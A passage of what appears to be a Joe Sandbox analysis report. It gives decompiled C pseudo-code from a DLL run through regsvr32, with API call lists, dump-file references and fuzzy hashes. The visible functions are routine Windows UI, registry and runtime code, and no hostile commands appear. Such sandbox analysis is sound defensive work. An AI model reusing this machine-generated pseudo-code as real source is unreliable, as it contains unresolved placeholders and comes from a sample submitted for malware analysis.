                                                                                                                					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                                                                				}
                                                                                                                				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                                                                                                                				_t83 =  *(_t72 + 0x3c) & 1;
                                                                                                                				if(( *(_t72 + 0x3c) & 1) != 0) {
                                                                                                                					_t71 =  *((intOrPtr*)(E100231BA(1, _t64, _t69, _t72, _t83) + 0x3c));
                                                                                                                					if(_t71 != 0) {
                                                                                                                						_t85 =  *(_t71 + 0x20);
                                                                                                                						if( *(_t71 + 0x20) != 0) {
                                                                                                                							E1003BB70(_t71,  &_v52, 0, 0x30);
                                                                                                                							_t48 =  *(_t72 + 0x20);
                                                                                                                							_v44 = _t48;
                                                                                                                							_v40 = _t48;
                                                                                                                							_v52 = 0x28;
                                                                                                                							_v48 = 1;
                                                                                                                							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                                                                                                                				E10019B72(_t61, _t72, GetWindowLongA, _t85);
                                                                                                                				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
                                                                                                                					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                                                                					if(_t43 != 0) {
                                                                                                                						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				E10019C90(_t61, _t72);
                                                                                                                				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                                                                			}




















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2997958587-3887548279
                                                                                                                • Opcode ID: 0b16d6b774c359e320efe5439514d25896af1906794a02916b1bfc98ddc6d33f
                                                                                                                • Instruction ID: 646b7dd67a2568912bb296f69b980447bcb33747180486673163819e3e7fcb23
                                                                                                                • Opcode Fuzzy Hash: 0b16d6b774c359e320efe5439514d25896af1906794a02916b1bfc98ddc6d33f
                                                                                                                • Instruction Fuzzy Hash: E831A035600711AFD710EFB8D884A6ABBF5FF48351F16062DE5829B692EB71F840CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E10037282(void* __ebx, void* __ecx) {
                                                                                                                				void* __ebp;
                                                                                                                				void* _t28;
                                                                                                                				void* _t36;
                                                                                                                				signed char _t37;
                                                                                                                				intOrPtr _t41;
                                                                                                                				void* _t42;
                                                                                                                				void* _t44;
                                                                                                                				intOrPtr _t45;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_t39 = __ecx;
                                                                                                                				_t36 = __ebx;
                                                                                                                				_t41 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                                				if(_t41 == 0) {
                                                                                                                					_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                                					L14:
                                                                                                                					_t42 = E10019C16(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
                                                                                                                					if(_t42 != 0) {
                                                                                                                						L7:
                                                                                                                						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
                                                                                                                							L18:
                                                                                                                							return _t42;
                                                                                                                						}
                                                                                                                						_push(_t36);
                                                                                                                						_t37 =  *(_t46 + 0x1c);
                                                                                                                						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
                                                                                                                							if((_t37 & 0x00000002) == 0) {
                                                                                                                								L16:
                                                                                                                								_push(_t37);
                                                                                                                								_push(0);
                                                                                                                								_push(_t42);
                                                                                                                								goto L17;
                                                                                                                							}
                                                                                                                							_t39 = _t42;
                                                                                                                							if(E1001D37F(_t42) != 0) {
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						} else {
                                                                                                                							L12:
                                                                                                                							_push(_t37);
                                                                                                                							_push(_t42);
                                                                                                                							_push(_t45);
                                                                                                                							L17:
                                                                                                                							_t42 = E10037282(_t37, _t39);
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t45;
                                                                                                                				}
                                                                                                                				_t28 = E10019C16(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
                                                                                                                				_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                                                                				while(_t28 == 0) {
                                                                                                                					_t41 = E1003722D(_t45, E10019C16(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
                                                                                                                					if(_t41 == 0 || _t41 == _t45) {
                                                                                                                						goto L14;
                                                                                                                					} else {
                                                                                                                						_t28 = E10019C16(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t42 = E10019C16(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
                                                                                                                				goto L7;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • GetWindow.USER32(?,00000002), ref: 1003729D
                                                                                                                • GetParent.USER32(?), ref: 100372AE
                                                                                                                • GetWindow.USER32(?,00000002), ref: 100372D1
                                                                                                                • GetWindow.USER32(?,00000002), ref: 100372E3
                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 100372F2
                                                                                                                • IsWindowVisible.USER32(?), ref: 1003730C
                                                                                                                • GetTopWindow.USER32(?), ref: 10037332
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$LongParentVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 506644340-0
                                                                                                                • Opcode ID: db1ed30975c4b4341f77946dd70a0f166145a2dbfe5d0da4e5565e87ac678af5
                                                                                                                • Instruction ID: 4683d112d1417ba05f71a0138114187fbea13b5c4c1c149e40658622002acd44
                                                                                                                • Opcode Fuzzy Hash: db1ed30975c4b4341f77946dd70a0f166145a2dbfe5d0da4e5565e87ac678af5
                                                                                                                • Instruction Fuzzy Hash: 7D21A172A40721AFD672EB728C49F5B76DCFF44691F010914FD89AF152EA20ED4096A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10039A4B(void* __ecx) {
                                                                                                                				struct tagMSG _v28;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				int _t21;
                                                                                                                				intOrPtr _t24;
                                                                                                                				int _t31;
                                                                                                                				intOrPtr _t33;
                                                                                                                				void* _t38;
                                                                                                                				void* _t39;
                                                                                                                				int _t40;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_t39 = __ecx;
                                                                                                                				_t40 = 0xf;
                                                                                                                				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
                                                                                                                					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
                                                                                                                					__eflags = _t21;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						DispatchMessageA( &_v28);
                                                                                                                						_push(0);
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					return _t21;
                                                                                                                				}
                                                                                                                				_t24 =  *((intOrPtr*)(_t39 + 0x68));
                                                                                                                				_t36 =  *((intOrPtr*)(_t24 + 0x84));
                                                                                                                				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x84));
                                                                                                                				 *(_t39 + 0x78) =  *(_t24 + 0x80) & 0x0000f000;
                                                                                                                				SetRectEmpty(_t39 + 0xc);
                                                                                                                				 *((intOrPtr*)(_t39 + 0x20)) = 0;
                                                                                                                				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t39 + 0x24)) = 0;
                                                                                                                				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t39 + 0x80)) = 0;
                                                                                                                				_t38 = E10019C16(0,  *((intOrPtr*)(_t24 + 0x84)), _t40, GetDesktopWindow());
                                                                                                                				_t31 = LockWindowUpdate( *(_t38 + 0x20));
                                                                                                                				_t43 = _t31;
                                                                                                                				if(_t31 == 0) {
                                                                                                                					_push(3);
                                                                                                                				} else {
                                                                                                                					_push(0x403);
                                                                                                                				}
                                                                                                                				_push(GetDCEx( *(_t38 + 0x20), 0, ??));
                                                                                                                				_t33 = E10024520(0, _t36, _t38, _t39, _t43);
                                                                                                                				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
                                                                                                                				return _t33;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • GetMessageA.USER32 ref: 10039A6A
                                                                                                                • DispatchMessageA.USER32 ref: 10039A7D
                                                                                                                • PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10039A8C
                                                                                                                • SetRectEmpty.USER32(?), ref: 10039AB0
                                                                                                                • GetDesktopWindow.USER32 ref: 10039AC8
                                                                                                                • LockWindowUpdate.USER32(?), ref: 10039AD9
                                                                                                                • GetDCEx.USER32 ref: 10039AF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1192691108-0
                                                                                                                • Opcode ID: eee638cfbedbbeda8b22226dbff34469ed2deea6dca75aa8db27abc160bf9878
                                                                                                                • Instruction ID: 09f65e7e968bd6785725b1496a7956e05750ea863ea492e76bf28e53b038bb67
                                                                                                                • Opcode Fuzzy Hash: eee638cfbedbbeda8b22226dbff34469ed2deea6dca75aa8db27abc160bf9878
                                                                                                                • Instruction Fuzzy Hash: A2213DB2500B05AFE711DF65DC88E67BBECFB08255F05092EF586C7521EB35E9048B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10035675(intOrPtr __ecx) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				int _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _t32;
                                                                                                                
                                                                                                                				_t32 = __ecx;
                                                                                                                				_v24 = __ecx;
                                                                                                                				_v16 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                                                                					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                                                                				}
                                                                                                                				if(_v8 != 0) {
                                                                                                                					RegCloseKey(_v8);
                                                                                                                				}
                                                                                                                				if(_v12 != 0) {
                                                                                                                					RegCloseKey(_v12);
                                                                                                                				}
                                                                                                                				return _v16;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 100356A3
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 100356C6
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 100356E2
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 100356F2
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 100356FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreate$Open
                                                                                                                • String ID: software
                                                                                                                • API String ID: 1740278721-2010147023
                                                                                                                • Opcode ID: 62c2c7bb3bdf09cc3a2889ca3b3858cddec6abeceda998d2e95bf2fba2873a8a
                                                                                                                • Instruction ID: f4c95b2887043273cea465c1da17ebb04d73c30ece9e4d32166d255c3d06eae5
                                                                                                                • Opcode Fuzzy Hash: 62c2c7bb3bdf09cc3a2889ca3b3858cddec6abeceda998d2e95bf2fba2873a8a
                                                                                                                • Instruction Fuzzy Hash: 5F111372D00159FBCB11DB9ACD89CDFBFBCEF89741F1040AAE500A7121D6719A04DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 10017F81
                                                                                                                • GetWindowRect.USER32 ref: 10017F9C
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10017FAF
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10017FB8
                                                                                                                • EqualRect.USER32 ref: 10017FC2
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10017FEA
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10017FF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 443303494-0
                                                                                                                • Opcode ID: 00b1adbe83bcef3a522259b0912683e7d7d31cc8e02aa9cafa4427dba62b8766
                                                                                                                • Instruction ID: 6d958f451040b09417e08f1e1f3fd1edce341b46a4e12f911d2b2c27adda64c4
                                                                                                                • Opcode Fuzzy Hash: 00b1adbe83bcef3a522259b0912683e7d7d31cc8e02aa9cafa4427dba62b8766
                                                                                                                • Instruction Fuzzy Hash: A611FB7650011AAFDB00DF64DC84EABB7BDFB88350B108429F91697254EB30E945CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1002D51A(void* __ecx, long* __edi, void* __esi) {
                                                                                                                				long _t22;
                                                                                                                				void* _t23;
                                                                                                                				void* _t28;
                                                                                                                				void* _t33;
                                                                                                                				signed int _t35;
                                                                                                                				long* _t40;
                                                                                                                				void* _t41;
                                                                                                                				void* _t42;
                                                                                                                
                                                                                                                				_t41 = __esi;
                                                                                                                				_t40 = __edi;
                                                                                                                				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                                                                                                                				E1003D2F0(0, 0);
                                                                                                                				_t22 = E10001710(__edi[3], 4);
                                                                                                                				_t33 = 2;
                                                                                                                				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                                                                                                                				_t46 = _t23;
                                                                                                                				if(_t23 == 0) {
                                                                                                                					LeaveCriticalSection( *(_t42 - 0x14));
                                                                                                                					_t23 = E1001726A(0, _t33, __edi, __esi, _t46);
                                                                                                                				}
                                                                                                                				 *(_t41 + 0xc) = _t23;
                                                                                                                				E1003BB70(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                                                                                                                				 *(_t41 + 8) = _t40[3];
                                                                                                                				TlsSetValue( *_t40, _t41);
                                                                                                                				_t35 =  *(_t42 + 8);
                                                                                                                				_t28 =  *(_t41 + 0xc);
                                                                                                                				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                                                                                                                					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                                                                                                                				}
                                                                                                                				_push( *(_t42 - 0x14));
                                                                                                                				LeaveCriticalSection();
                                                                                                                				return E1003D2BE(_t28);
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1002D521
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1002D52B
                                                                                                                  • Part of subcall function 1003D2F0: RaiseException.KERNEL32(10023196,100172B8,DF7C0CDA,?,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1003D330
                                                                                                                • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D542
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D54F
                                                                                                                  • Part of subcall function 1001726A: __CxxThrowException@8.LIBCMT ref: 1001727E
                                                                                                                • _memset.LIBCMT ref: 1002D56E
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 1002D57F
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D5A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 356813703-0
                                                                                                                • Opcode ID: def24eefd583ca14c286eebc585be1b53909d4f89bd6ffcfa2ca1ee0578da8fe
                                                                                                                • Instruction ID: 26d0727d94b835bf11b526e35cb939738d49fc3fb0b46f7a1e8c6127f3c576ac
                                                                                                                • Opcode Fuzzy Hash: def24eefd583ca14c286eebc585be1b53909d4f89bd6ffcfa2ca1ee0578da8fe
                                                                                                                • Instruction Fuzzy Hash: C011CB70100A05AFE710EF64EC89C6ABBB9FF08354B60C52AF91A97126CB30FC20CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002D039(void* __ecx) {
                                                                                                                				struct HBRUSH__* _t14;
                                                                                                                				void* _t18;
                                                                                                                
                                                                                                                				_t18 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                                                                                                                				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                                                                                                                				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                                                                                                                				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                                                                                                                				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                                                                                                                				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                                                                                                                				_t14 = GetSysColorBrush(6);
                                                                                                                				 *(_t18 + 0x20) = _t14;
                                                                                                                				return _t14;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Brush
                                                                                                                • String ID:
                                                                                                                • API String ID: 2798902688-0
                                                                                                                • Opcode ID: ac4796e01312ba7b2d69d7820cecd9d1b145ccb4f1531994faa7855deb8d460e
                                                                                                                • Instruction ID: a18c4b94b262f25f692ab051dac313c6dbdc37b8c5e2508b083c57a345dbcb63
                                                                                                                • Opcode Fuzzy Hash: ac4796e01312ba7b2d69d7820cecd9d1b145ccb4f1531994faa7855deb8d460e
                                                                                                                • Instruction Fuzzy Hash: 9FF012719407445BD730BF729D49B47BAD1FFC4710F02092ED2418B990E6B6E041DF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1005527A() {
                                                                                                                				long _t5;
                                                                                                                				int _t6;
                                                                                                                
                                                                                                                				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
                                                                                                                					_t5 = GetVersion();
                                                                                                                					if((0x80000000 & _t5) != 0) {
                                                                                                                						L5:
                                                                                                                						 *0x10070f18 =  *0x10070f18 & 0x00000000;
                                                                                                                						return _t5;
                                                                                                                					}
                                                                                                                					_t5 = GetVersion();
                                                                                                                					if(_t5 != 3) {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					goto L4;
                                                                                                                				} else {
                                                                                                                					L4:
                                                                                                                					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                                                                                                					 *0x10070f18 = _t6;
                                                                                                                					return _t6;
                                                                                                                				}
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Version$ClipboardFormatRegister
                                                                                                                • String ID: MSWHEEL_ROLLMSG
                                                                                                                • API String ID: 2888461884-2485103130
                                                                                                                • Opcode ID: 6f18dcd10c8c3969c80a51775aa53bd8fb314a8bf8b8fda711ecb7624730db60
                                                                                                                • Instruction ID: be6550e908f1e800e86f5072c3b819501bdb24c7a338a38086d66e6e9838e1b8
                                                                                                                • Opcode Fuzzy Hash: 6f18dcd10c8c3969c80a51775aa53bd8fb314a8bf8b8fda711ecb7624730db60
                                                                                                                • Instruction Fuzzy Hash: 2FE04F3A90113B96E351A764AD5039D37E4DB4B1A2F52013EDA00D7550EA65088B4BA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10033F16(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t163;
                                                                                                                				signed short _t178;
                                                                                                                				signed int _t184;
                                                                                                                				signed short _t185;
                                                                                                                				intOrPtr* _t187;
                                                                                                                				void* _t189;
                                                                                                                				signed short _t198;
                                                                                                                				signed short _t200;
                                                                                                                				signed int _t203;
                                                                                                                				signed short _t206;
                                                                                                                				signed short _t213;
                                                                                                                				signed short _t215;
                                                                                                                				signed short _t224;
                                                                                                                				long long* _t231;
                                                                                                                				intOrPtr* _t235;
                                                                                                                				void* _t237;
                                                                                                                				void* _t243;
                                                                                                                				void* _t246;
                                                                                                                				intOrPtr* _t248;
                                                                                                                				void* _t254;
                                                                                                                				void* _t257;
                                                                                                                				signed int _t260;
                                                                                                                				signed short _t261;
                                                                                                                				signed short _t262;
                                                                                                                				signed short _t266;
                                                                                                                				signed short _t270;
                                                                                                                				intOrPtr* _t271;
                                                                                                                				void* _t281;
                                                                                                                				signed short _t295;
                                                                                                                				void* _t339;
                                                                                                                				void* _t341;
                                                                                                                				signed short _t343;
                                                                                                                				void* _t344;
                                                                                                                				intOrPtr* _t345;
                                                                                                                				signed int _t346;
                                                                                                                				void* _t348;
                                                                                                                				intOrPtr _t352;
                                                                                                                				signed long long _t358;
                                                                                                                
                                                                                                                				_t342 = __esi;
                                                                                                                				_t337 = __edx;
                                                                                                                				_t282 = __ecx;
                                                                                                                				_t346 = _t348 - 0x64;
                                                                                                                				_t163 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t346 + 0x68) = _t163 ^ _t346;
                                                                                                                				_push(0xcc);
                                                                                                                				E1003D1E6(E10054A93, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t346 + 0x4c)) =  *((intOrPtr*)(_t346 + 0x74));
                                                                                                                				_t339 = __ecx;
                                                                                                                				 *(_t346 + 0x30) = 0;
                                                                                                                				_t352 =  *((intOrPtr*)(__ecx + 0x48));
                                                                                                                				_t353 = _t352 == 0;
                                                                                                                				if(_t352 == 0) {
                                                                                                                					L1:
                                                                                                                					E1001729E(0, _t282, _t339, _t342, _t353);
                                                                                                                				}
                                                                                                                				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				E1002A12B(_t346 + 0x3c);
                                                                                                                				_t343 = 3;
                                                                                                                				 *((intOrPtr*)(_t346 - 4)) = 0;
                                                                                                                				 *(_t346 + 0x50) = _t343;
                                                                                                                				E10031A51( *((intOrPtr*)(_t339 + 0x54)),  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
                                                                                                                				if( *(_t346 + 0x50) != _t343) {
                                                                                                                					_t340 =  *((intOrPtr*)(_t339 + 0x54));
                                                                                                                					_t178 = E1002FB3A( *((intOrPtr*)(_t339 + 0x54)), __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
                                                                                                                					__eflags = _t178;
                                                                                                                					if(_t178 == 0) {
                                                                                                                						goto L4;
                                                                                                                					} else {
                                                                                                                						_t184 =  *(_t346 + 0x50) & 0x0000ffff;
                                                                                                                						_t345 = __imp__#9;
                                                                                                                						__eflags = _t184 - 0x81;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							_t185 = _t184 - 0x82;
                                                                                                                							__eflags = _t185;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L50;
                                                                                                                							} else {
                                                                                                                								_t198 = _t185 - 1;
                                                                                                                								__eflags = _t198;
